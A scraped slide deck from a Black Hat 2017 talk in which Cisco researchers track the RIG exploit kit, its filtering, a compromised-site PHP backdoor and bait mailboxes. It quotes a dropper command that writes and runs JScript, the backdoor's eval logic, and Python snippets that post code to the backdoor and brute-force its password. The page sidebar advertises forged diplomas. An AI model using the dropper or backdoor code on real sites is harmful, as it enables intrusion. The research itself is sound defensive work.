SlideShare a Scribd company logo
Brad Antoniewicz
(statements and opinions do not represent the views of, or have been endorsed by, our employer)
Matt Foley
Exploit Kit Cornucopia
2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Speakers
Matt Foley
Intern @ Cisco Umbrella
CS Major @ NYU Tandon
Brad Antoniewicz
Researcher @ Cisco Umbrella
@brad_anton
http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Agenda
Background
Crawling
Amplifying Convictions
Backdoored
Disposable Mailboxes
http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Pseudo-Darkleech Campaign Using
Rig Exploit Kit
8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Kit
Script
Ransomware
, Trojan,
etc...
9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c
"+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp
"gexywoaxor"
"http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]"
"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Landing Page Injection
Compromised Site
Ad Net. Subscriber Staged Site (Ad)
Victim
Malvertising
Compromised Site
RIG Server
Gets lander
(proxy)
Step 1.
11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Filtering
Compromised Site
Ad Net. Subscriber Staged Site (Ad)
RIG Server
Victim
Malvertising
Compromised Site
Gets ‘proxy’
TDS/Crawler Filtering
TDS
TDS, Browser, IP,
Region, Time
Step 1.
12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Delivery
Victim
Step 1.
Step 2.
Render iframe
Lander
Virtual Dedicated
Server (VDS)
Gets exploit
15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Exploit Regurgitation
CVE-2015-8651 (Flash)
CVE-2015-0311 (Flash)
CVE-2016-4117 (Flash)
CVE-2016-0189 (IE)
CVE-2015-2419 (IE)
17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg
http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
ektracker.com
Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Domains/Registrants
21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraping
22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V1 Orchestration
Domains in queue
Worker
Worker
23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V1 Worker
DOM
Query site twice, then diff
dom/source
Requests
source Filters
24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Popularity and Spike
Google.com
Lander
25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proxy V1
BLOCKED
26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Scraper V2
Candidate 1
EK Decoder
Module
Candidate 2
Candidate 3
Browser (requests) Browser (requests)
Detector Module
27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Decoder Module
Lander
Source and suspected
EK passed to decoder
EK Decoder
Module
Flash exploits,
executables, etc.
Decoder parses JS and
identifies EK artifacts
28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proxy V2
Rotating IPsChoice of regionSquid Proxy
29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Sources for Scraping
ektracker.com
malware-traffic-analysis.net
zerophagemalware.com
broadanalysis.com
malwarebreakdown.com
Credit: @nao_sec
(Where to get suspected exploit kit sites)
30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg
https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg
Amplifying Convictions with
Hitlist
31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Compromised Site: Unknown
Backend
Logs
Gate: Known
33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Conviction: Amplified!
S3 Lambda
if host in eks:
s3.put_object(...)
Logs
EK List
Candidates
Filter Convict
34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Teamwork makes the dream work
Scraper: Finds
Landers, Confirms
HitList detections
HitList: Finds
compromised sites
35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Show graphic of detections!
Fancy D3 graph goes here
Gates to compromised sites
36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoored
37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Campaign Orchestration
Compromised Sites
preg_replace(‘/12/e’,$code,‘12’)
nav-menu.php backdoor (pseudo-darkleech)
Attacker
eval()
38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoor Obfuscation and ‘Security’
$_passssword = '0a02419ec68460d4a320c53b680441ff';
if (@$p[$_passssword] AND @$p['a'] AND @$p['c'])
@$p[$_passssword](@$p['a'], @$p['c'], '');
nav-menu.php backdoor
39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
'0a02419ec68460d4a320c53b680441ff'
40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
$url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=’);
nav-menu.php backdoor
41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
/blog/?manchester&utm_source=82267:1021107:2013
userid?flowid?
42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
/blog/?manchester&utm_source=82267:1021107:2013
userid?flowid?
/blog/?manchester&utm_source=65857:1018137:2013
/blog/?manchester&utm_source=50426:1022174:2013
/blog/?manchester&utm_source=77620:1019894:2013
/blog/?manchester&utm_source=33398:1017062:2013
43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Backdoor access
pw = hashlib.md5(‘1021107’).hexdigest()
data = {
pw: ‘preg_match’,
‘a’: ‘//e’,
‘c’: ‘some_php_code’
}
requests.post(compromised_site, data=data)
44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
nginx
Apache
Reasonable, but still good for us
awwwyisssss
45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Brute Forcing
data = { ‘a’: ‘//e’, ‘c’: ‘some_php_code’ }
for i in range(1010000, 1030000):
pw = hashlib.md5(str(i)).hexdigest()
data[pw] = ‘preg_match’
requests.post(compromised_site, data=data)
46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
POST Data
47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Bypassing Filtering
Compromised Site
Staged Site (Ad)
RIG Server
Request new gates, spoof
UserAgent, Source IP, etc..
48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Reliable EK Server Hosting
49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Disposable Mailboxes
50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Not good for research
51@brad_anton
52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
MailRunnerIdentifying ransomware and commodity malware
Bait Mailboxes
Block
Dewey
Classification
Engine
Convict, then pass
on email attributes
53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Detections
(One mailbox)
7.4k Malicious Emails
15k Unique Domains
@brad_anton
54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
lacedmail.com
55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Little Things
56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Recap
Good for researchBad guy mistakes :)Amplify convictionsRoll your own scraper/proxy
Exploit Kit Cornucopia - Blackhat USA 2017

More Related Content

What's hot

Code on the chain! An introduction in writing smart contracts and tooling for...
Code on the chain! An introduction in writing smart contracts and tooling for...Code on the chain! An introduction in writing smart contracts and tooling for...
Code on the chain! An introduction in writing smart contracts and tooling for...
Codemotion
 
Linux Foundation Live Webinar: Applying Governance to CI/CD
Linux Foundation Live Webinar: Applying Governance to CI/CDLinux Foundation Live Webinar: Applying Governance to CI/CD
Linux Foundation Live Webinar: Applying Governance to CI/CD
Tiffany Jachja
 
Patch Tuesday - August 2017 - Ivanti
Patch Tuesday - August 2017 - IvantiPatch Tuesday - August 2017 - Ivanti
Patch Tuesday - August 2017 - Ivanti
Erica Azad
 
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
Codemotion
 
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
NoNameCon
 
【HITCON Hackathon 2017】 TrendMicro Datasets
【HITCON Hackathon 2017】 TrendMicro Datasets【HITCON Hackathon 2017】 TrendMicro Datasets
【HITCON Hackathon 2017】 TrendMicro Datasets
Hacks in Taiwan (HITCON)
 
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
SBA Research
 
Trend briefs security
Trend briefs securityTrend briefs security
Trend briefs security
Jongseok Choi
 
September 2017 Patch Tuesday
September 2017 Patch TuesdaySeptember 2017 Patch Tuesday
September 2017 Patch Tuesday
Ivanti
 

What's hot (9)

Code on the chain! An introduction in writing smart contracts and tooling for...
Code on the chain! An introduction in writing smart contracts and tooling for...Code on the chain! An introduction in writing smart contracts and tooling for...
Code on the chain! An introduction in writing smart contracts and tooling for...
 
Linux Foundation Live Webinar: Applying Governance to CI/CD
Linux Foundation Live Webinar: Applying Governance to CI/CDLinux Foundation Live Webinar: Applying Governance to CI/CD
Linux Foundation Live Webinar: Applying Governance to CI/CD
 
Patch Tuesday - August 2017 - Ivanti
Patch Tuesday - August 2017 - IvantiPatch Tuesday - August 2017 - Ivanti
Patch Tuesday - August 2017 - Ivanti
 
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
Security in the IoT generation - Guy Rombaut - Codemotion Amsterdam 2017
 
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
 
【HITCON Hackathon 2017】 TrendMicro Datasets
【HITCON Hackathon 2017】 TrendMicro Datasets【HITCON Hackathon 2017】 TrendMicro Datasets
【HITCON Hackathon 2017】 TrendMicro Datasets
 
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
SBA Live Academy - After the overflow: self-defense techniques (Linux Kernel)...
 
Trend briefs security
Trend briefs securityTrend briefs security
Trend briefs security
 
September 2017 Patch Tuesday
September 2017 Patch TuesdaySeptember 2017 Patch Tuesday
September 2017 Patch Tuesday
 

Similar to Exploit Kit Cornucopia - Blackhat USA 2017

Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 -  Security Through The Eyes of a HackerCisco Connect Toronto 2017 -  Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Canada
 
Mfg workshop security
Mfg workshop   securityMfg workshop   security
Mfg workshop security
Robert Albach
 
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
Nur Shiqim Chok
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Codemotion
 
Brksec 2048-demystifying aci-security
Brksec 2048-demystifying aci-securityBrksec 2048-demystifying aci-security
Brksec 2048-demystifying aci-security
Cisco
 
Cisco Connect 2018 Philippines - software-defined access-a transformational ...
 Cisco Connect 2018 Philippines - software-defined access-a transformational ... Cisco Connect 2018 Philippines - software-defined access-a transformational ...
Cisco Connect 2018 Philippines - software-defined access-a transformational ...
NetworkCollaborators
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Canada
 
Cisco Cybersecurity #10YearChallenge
Cisco Cybersecurity #10YearChallengeCisco Cybersecurity #10YearChallenge
Cisco Cybersecurity #10YearChallenge
Cristian Garcia G.
 
Elastic Cloud Enterprise @ Cisco
Elastic Cloud Enterprise @ CiscoElastic Cloud Enterprise @ Cisco
Elastic Cloud Enterprise @ Cisco
Elasticsearch
 
Meeting rooms are talking. Are you listening
Meeting rooms are talking. Are you listeningMeeting rooms are talking. Are you listening
Meeting rooms are talking. Are you listening
Cisco DevNet
 
Cisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre securityCisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre security
Cisco Canada
 
[Cisco Connect 2018 - Vietnam] Cisco connect 2018 sanjay - cisco sda v1.0-h...
[Cisco Connect 2018 - Vietnam] Cisco connect 2018   sanjay - cisco sda v1.0-h...[Cisco Connect 2018 - Vietnam] Cisco connect 2018   sanjay - cisco sda v1.0-h...
[Cisco Connect 2018 - Vietnam] Cisco connect 2018 sanjay - cisco sda v1.0-h...
Nur Shiqim Chok
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dc
Cisco Canada
 
Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy  Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy
NetworkCollaborators
 
Firepower ngfw internet
Firepower ngfw internetFirepower ngfw internet
Firepower ngfw internet
Rony Melo
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
Security and Virtualization in the Data Center
Security and Virtualization in the Data CenterSecurity and Virtualization in the Data Center
Security and Virtualization in the Data Center
Cisco Canada
 
Network visibility for efficient Openstack operations
Network visibility for efficient Openstack operationsNetwork visibility for efficient Openstack operations
Network visibility for efficient Openstack operations
Yathiraj Udupi, Ph.D.
 
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
Cisco Canada
 
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
NetworkCollaborators
 

Similar to Exploit Kit Cornucopia - Blackhat USA 2017 (20)

Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 -  Security Through The Eyes of a HackerCisco Connect Toronto 2017 -  Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
 
Mfg workshop security
Mfg workshop   securityMfg workshop   security
Mfg workshop security
 
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect[Cisco Connect 2018 - Vietnam] Eric rennie  sw cisco_connect
[Cisco Connect 2018 - Vietnam] Eric rennie sw cisco_connect
 
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
 
Brksec 2048-demystifying aci-security
Brksec 2048-demystifying aci-securityBrksec 2048-demystifying aci-security
Brksec 2048-demystifying aci-security
 
Cisco Connect 2018 Philippines - software-defined access-a transformational ...
 Cisco Connect 2018 Philippines - software-defined access-a transformational ... Cisco Connect 2018 Philippines - software-defined access-a transformational ...
Cisco Connect 2018 Philippines - software-defined access-a transformational ...
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
 
Cisco Cybersecurity #10YearChallenge
Cisco Cybersecurity #10YearChallengeCisco Cybersecurity #10YearChallenge
Cisco Cybersecurity #10YearChallenge
 
Elastic Cloud Enterprise @ Cisco
Elastic Cloud Enterprise @ CiscoElastic Cloud Enterprise @ Cisco
Elastic Cloud Enterprise @ Cisco
 
Meeting rooms are talking. Are you listening
Meeting rooms are talking. Are you listeningMeeting rooms are talking. Are you listening
Meeting rooms are talking. Are you listening
 
Cisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre securityCisco Connect Ottawa 2018 data centre security
Cisco Connect Ottawa 2018 data centre security
 
[Cisco Connect 2018 - Vietnam] Cisco connect 2018 sanjay - cisco sda v1.0-h...
[Cisco Connect 2018 - Vietnam] Cisco connect 2018   sanjay - cisco sda v1.0-h...[Cisco Connect 2018 - Vietnam] Cisco connect 2018   sanjay - cisco sda v1.0-h...
[Cisco Connect 2018 - Vietnam] Cisco connect 2018 sanjay - cisco sda v1.0-h...
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dc
 
Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy  Cisco Connect 2018 Singapore - Cybersecurity strategy
Cisco Connect 2018 Singapore - Cybersecurity strategy
 
Firepower ngfw internet
Firepower ngfw internetFirepower ngfw internet
Firepower ngfw internet
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
 
Security and Virtualization in the Data Center
Security and Virtualization in the Data CenterSecurity and Virtualization in the Data Center
Security and Virtualization in the Data Center
 
Network visibility for efficient Openstack operations
Network visibility for efficient Openstack operationsNetwork visibility for efficient Openstack operations
Network visibility for efficient Openstack operations
 
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
 
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
Cisco Connect 2018 Malaysia - Cisco aci-delivering intent for data center net...
 

Recently uploaded

制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
cuobya
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
fovkoyb
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
Trending Blogers
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
Laura Szabó
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
hackersuli
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
test test test test testtest test testtest test testtest test testtest test ...
test test  test test testtest test testtest test testtest test testtest test ...test test  test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
ufdana
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 

Recently uploaded (20)

制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
 
Explore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories SecretlyExplore-Insanony: Watch Instagram Stories Secretly
Explore-Insanony: Watch Instagram Stories Secretly
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Gen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needsGen Z and the marketplaces - let's translate their needs
Gen Z and the marketplaces - let's translate their needs
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
